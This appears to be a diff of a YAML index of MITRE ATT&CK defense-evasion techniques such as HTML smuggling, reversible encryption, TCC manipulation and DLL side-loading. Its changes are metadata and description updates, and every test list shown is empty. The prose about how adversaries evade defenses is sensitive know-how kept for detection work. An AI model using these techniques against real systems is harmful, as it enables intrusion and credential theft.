+        url: https://attack.mitre.org/techniques/T1036/010
+        external_id: T1036.010
+      - source_name: Elastic CUBA Ransomware 2022
+        description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+          Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+          August 5, 2024.
+        url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+      - source_name: Invictus IR Cloud Ransomware 2024
+        description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+          August 5, 2024.
+        url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+      - source_name: Huntress MOVEit 2023
+        description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+          CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+        url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+      - source_name: Aquasec Kubernetes Attack 2023
+        description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+          Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+          2023.
+        url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.001:
+    technique:
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -12021,6 +12323,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -12035,22 +12338,42 @@ defense-evasion:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.006:
     technique:
-      modified: '2023-07-14T14:01:41.475Z'
+      modified: '2024-09-12T19:12:13.006Z'
       name: HTML Smuggling
       description: |-
         Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
@@ -12108,48 +12431,17 @@ defense-evasion:
         url: https://www.menlosecurity.com/blog/new-attack-alert-duri
       - source_name: nccgroup Smuggling HTA 2017
         description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
-          Explorer/Edge. Retrieved May 20, 2021.
-        url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+          Explorer/Edge. Retrieved September 12, 2024.
+        url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.006
     atomic_tests: []
   T1556.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
-      type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -12171,6 +12463,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -12181,23 +12474,50 @@ defense-evasion:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:43:18.873Z'
       name: Command Obfuscation
       description: |-
         Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
@@ -12238,8 +12558,9 @@ defense-evasion:
         url: https://attack.mitre.org/techniques/T1027/010
         external_id: T1027.010
       - source_name: Twitter Richard WMIC
-        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
-        url: https://twitter.com/rfackroyd/status/1639136000755765254
+        description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+          2024.
+        url: https://x.com/rfackroyd/status/1639136000755765254
       - source_name: Invoke-Obfuscation
         description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
           March 17, 2023.
@@ -12275,43 +12596,23 @@ defense-evasion:
         url: https://redcanary.com/threat-detection-report/techniques/powershell/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1070.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Walker Johnson
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
-      created: '2020-01-31T12:35:36.479Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.004
-        url: https://attack.mitre.org/techniques/T1070/004
-      - source_name: Microsoft SDelete July 2016
-        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
-        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
-          8, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:33:59.107Z'
+      name: 'Indicator Removal on Host: File Deletion'
       description: |-
         Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
 
         There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Indicator Removal on Host: File Deletion'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Walker Johnson
+      x_mitre_deprecated: false
       x_mitre_detection: It may be uncommon for events related to benign command-line
         functions such as DEL or third-party utilities or tools to be found in an
         environment, depending on the user base and how systems are typically used.
@@ -12322,18 +12623,36 @@ defense-evasion:
         network that an adversary could introduce. Some monitoring tools may collect
         command-line arguments, but may not capture DEL commands since DEL is a native
         function within cmd.exe.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Deletion'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+      created: '2020-01-31T12:35:36.479Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/004
+        external_id: T1070.004
+      - source_name: Microsoft SDelete July 2016
+        description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+          8, 2018.
+        url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.004
     atomic_tests: []
   T1221:
@@ -12395,7 +12714,7 @@ defense-evasion:
         description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
           2018.
         source_name: ryhanson phishery SEPT 2016
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-12T18:16:56.176Z'
       name: Template Injection
       description: |-
         Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
@@ -12425,13 +12744,11 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1221
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -12528,7 +12845,6 @@ defense-evasion:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1027.002:
     technique:
@@ -12591,7 +12907,6 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1027.002
     atomic_tests: []
   T1564.005:
@@ -12629,7 +12944,7 @@ defense-evasion:
         description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
           Equation Group: Questions and Answers. Retrieved December 21, 2015.'
         url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-29T15:12:11.024Z'
       name: Hidden File System
       description: |-
         Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -12656,8 +12971,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1055.005:
     technique:
@@ -12685,7 +12998,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -12729,8 +13042,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1622:
     technique:
@@ -12785,7 +13096,7 @@ defense-evasion:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -12805,7 +13116,6 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests: []
   T1036.006:
@@ -12855,7 +13165,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1036.006
     atomic_tests: []
   T1550.002:
@@ -12910,12 +13219,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -12965,12 +13273,11 @@ defense-evasion:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1216.002:
     technique:
-      modified: '2024-04-18T23:51:40.464Z'
+      modified: '2024-09-12T19:42:21.547Z'
       name: SyncAppvPublishingServer
       description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
         of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -13030,8 +13337,8 @@ defense-evasion:
       - source_name: 7 - appv
         description: Nick Landers. (2017, August 8). Need a signed alternative to
           Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
-          Retrieved February 6, 2024.
-        url: https://twitter.com/monoxgas/status/895045566090010624
+          Retrieved September 12, 2024.
+        url: https://x.com/monoxgas/status/895045566090010624
       - source_name: 3 - appv
         description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
           Evasion (T1202). Retrieved February 6, 2024.'
@@ -13048,37 +13355,18 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -13086,6 +13374,8 @@ defense-evasion:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -13093,7 +13383,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -13123,7 +13413,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -13169,7 +13458,7 @@ defense-evasion:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -13214,8 +13503,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.007:
     technique:
@@ -13260,7 +13547,7 @@ defense-evasion:
         To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
 
         Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-08-23T18:32:46.899Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Obfuscated Files or Information: Dynamic API Resolution'
       x_mitre_detection: ''
@@ -13274,58 +13561,28 @@ defense-evasion:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.007
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
